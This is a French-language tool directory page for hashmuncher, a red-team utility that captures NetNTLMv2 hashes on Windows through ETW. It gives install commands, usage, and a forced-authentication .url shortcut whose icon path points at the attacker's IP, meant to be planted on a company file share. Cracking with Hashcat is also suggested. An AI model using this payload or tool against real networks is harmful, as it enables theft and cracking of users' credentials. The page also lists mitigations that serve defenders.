Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
hashmuncher — Récupérez les hashs NetNTLMv2 via ETW avec des droits administratifs sur Windows 8.1 / Windows Server 2016 et versions ultérieures. | Kitploit
Outils/GitHubGitHub/lkarlslund/hashmuncher
Sniffing et Analyse de PaquetsAttaques de Mots de PasseAnalyse de HachageCollecte d'InformationsTests d'IntrusionRed Teaming
GitHublkarlslund/hashmuncher

hashmuncher

Récupérez les hashs NetNTLMv2 via ETW avec des droits administratifs sur Windows 8.1 / Windows Server 2016 et versions ultérieures.

Voir le dépôt
12676il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Hash Muncher

Récupérez des hashes NetNTLMv2 en utilisant ETW avec des droits administrateur sur Windows

GitHub all releases GitHub Workflow Status

  • Requiert un accès élevé (administrateur) sur Windows 8.1 / Windows 2016 ou version ultérieure
  • Utilise le suivi d'événements pour Windows (ETW) pour accéder aux données brutes des paquets d'authentification SMB
  • Décode les messages NTLM de type 2 et 3
  • Affiche la sortie sur stdout ou dans un fichier
  • Appuyez sur Ctrl-C pour arrêter le traitement ou utilisez l'option de délai d'attente
  • Cracker les hashes avec HashCat en utilisant -m 5600

Obtenir Hash Muncher

Trois options différentes pour le faire fonctionner

A) Télécharger les binaires auto-construits depuis les versions

B) Construire et installer sur Windows avec cette commande Go

  • nécessite Golang
root@kitploit:~
go install github.com/lkarlslund/hashmuncher@latest

C) Compiler les binaires Windows sur n'importe quelle plateforme supportée par Golang avec PowerShell installé

  • nécessite Golang et PowerShell
root@kitploit:~
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1

Utilisation

  1. Assurez-vous que le pare-feu Windows autorise le « Partage de fichiers et d'imprimantes » car Hash Muncher nécessite que le service SMB intégré envoie et reçoive la requête initiale et les paquets de réponse vers la cible.

  2. Dans une invite élevée, exécutez Hash Muncher

root@kitploit:~
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
  1. Attendez maintenant que quelqu'un s'authentifie contre votre machine, ou placez un raccourci URL sur un partage de fichiers populaire comme ci-dessous.
root@kitploit:~
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1

Remplacez l'adresse IP par celle de votre machine Hash Muncher, et enregistrez le fichier sur un partage de fichiers (à l'échelle de l'entreprise) sous le nom 'whatever.url', puis regardez les hashes arriver en masse.

Il existe d'autres méthodes mentionnées dans Red Team Notes - Forced Authentication, et vous pouvez probablement aussi réussir en envoyant à tout le monde un document Word, mais ce n'est pas du tout furtif.

Détection

  • Aucune que j'aie vue, mais veuillez laisser un retour

Atténuation

  • Aucune pour la partie ETW, cela fait partie de la conception de Windows, dit Microsoft
  • Utilisez des mots de passe FORTS ! Cracker NetNTLMv2 n'est pas rapide du tout, mais avec des mots de passe faibles, cela peut certainement être fait.
  • Désactivez complètement NTLM ! Cela ne sera probablement pas sans douleur - mais voir Farewell NTLM - It is time to disable NTLM

Historique

J'ai joué avec ETW de temps en temps, mais dès que j'ai vu la très cool recherche de Nettitude Labs j'ai su que je devais en faire un outil facile à utiliser dans mon langage préféré, Golang ! Nettitude Labs a un POC fonctionnel écrit en C# tournant sous le framework .Net, et cela pourrait être une meilleure option pour vous. Donc je n'invente vraiment rien ici, j'ajoute simplement cela comme une alternative.

Si vous aimez les trucs de sécurité Windows, vous aimerez peut-être aussi mon outil de graphe d'attaque Adalanche

Télécharger l’outil